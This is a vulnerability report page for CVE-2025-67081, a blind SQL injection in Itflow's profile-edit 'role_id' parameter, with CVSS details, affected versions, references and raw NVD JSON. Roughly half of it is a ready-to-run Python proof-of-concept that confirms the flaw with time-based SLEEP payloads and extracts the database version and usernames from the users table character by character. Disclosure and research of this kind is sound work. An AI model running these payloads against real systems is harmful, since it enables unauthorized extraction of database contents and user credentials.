Security Vulnerability Report
CVE-2025-67081 CVSS 4.9 MEDIUM

CVE-2025-67081

Published: 2026-01-15 15:15:51
Last Modified: 2026-01-23 18:35:10

Description

An SQL injection vulnerability in Itflow through 25.06 has been identified in the "role_id" parameter when editing a profile. An attacker with an admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitization of an integer parameter.

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:itflow:itflow:*:*:*:*:*:*:*:* - VULNERABLE
Itflow <= 25.06 (versionEndIncluding: 25.06)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-67081 SQL Injection PoC for Itflow
Blind SQL Injection via role_id parameter in profile edit
Note: Requires admin privileges
"""
import requests
import time
import string

TARGET_URL = "http://target-host.com/profile_edit.php"
ADMIN_COOKIES = {"session": "admin_session_cookie_here"}


def test_sql_injection():
    """Test if the role_id parameter is vulnerable to SQL injection"""
    # Time-based blind SQL injection test
    payload = "1 AND IF(1=1, SLEEP(5), 0)"
    data = {"role_id": payload}
    start_time = time.time()
    response = requests.post(TARGET_URL, data=data, cookies=ADMIN_COOKIES)
    elapsed = time.time() - start_time
    if elapsed >= 5:
        print("[+] SQL Injection confirmed!")
        return True
    return False


def extract_database_version():
    """Extract database version using blind SQL injection"""
    charset = string.ascii_lowercase + string.digits + "-_."
    result = ""
    for pos in range(1, 50):
        for char in charset:
            payload = f"1 AND IF(SUBSTRING(@@version,{pos},1)='{char}', SLEEP(2), 0)"
            data = {"role_id": payload}
            start_time = time.time()
            requests.post(TARGET_URL, data=data, cookies=ADMIN_COOKIES)
            elapsed = time.time() - start_time
            if elapsed >= 2:
                result += char
                print(f"[*] Extracted: {result}")
                break
    return result


def extract_users():
    """Extract user credentials from database"""
    # Example: Extract username and password hash
    charset = string.ascii_lowercase + string.digits + string.ascii_uppercase
    username = ""
    for pos in range(1, 32):
        for char in charset:
            payload = f"1 AND IF(SUBSTRING((SELECT username FROM users LIMIT 1),{pos},1)='{char}', SLEEP(2), 0)"
            data = {"role_id": payload}
            start_time = time.time()
            requests.post(TARGET_URL, data=data, cookies=ADMIN_COOKIES)
            elapsed = time.time() - start_time
            if elapsed >= 2:
                username += char
                break
    return username


if __name__ == "__main__":
    print("[*] CVE-2025-67081 SQL Injection Test")
    if test_sql_injection():
        print("[*] Extracting database version...")
        version = extract_database_version()
        print(f"[+] Database Version: {version}")
```

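References

https://github.com/itflow-org/itflow (Product)
https://www.helx.io/blog/advisory-itflow/ (Third Party Advisory)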

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67081",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-15T15:15:50.740",
    "lastModified": "2026-01-23T18:35:09.720",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "An SQL injection vulnerability in Itflow through 25.06 has been identified in the \"role_id\" parameter when editing a profile. An attacker with admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing on integer parameter."},
      {"lang": "es", "value": "Una vulnerabilidad de inyección SQL en Itflow hasta la versión 25.06 ha sido identificada en el parámetro 'role_id' al editar un perfil. Un atacante con cuenta de administrador puede explotar este problema a través de inyección SQL ciega, permitiendo la extracción de datos arbitrarios de la base de datos. La vulnerabilidad surge de una sanitización insuficiente en el parámetro entero."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-89"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:itflow:itflow:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "25.06",
                "matchCriteriaId": "A4426A65-C3A8-4453-B209-4C4534130E0C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/itflow-org/itflow", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://www.helx.io/blog/advisory-itflow/", "source": "[email protected]", "tags": ["Third Party Advisory"]}
    ]
  }
}
```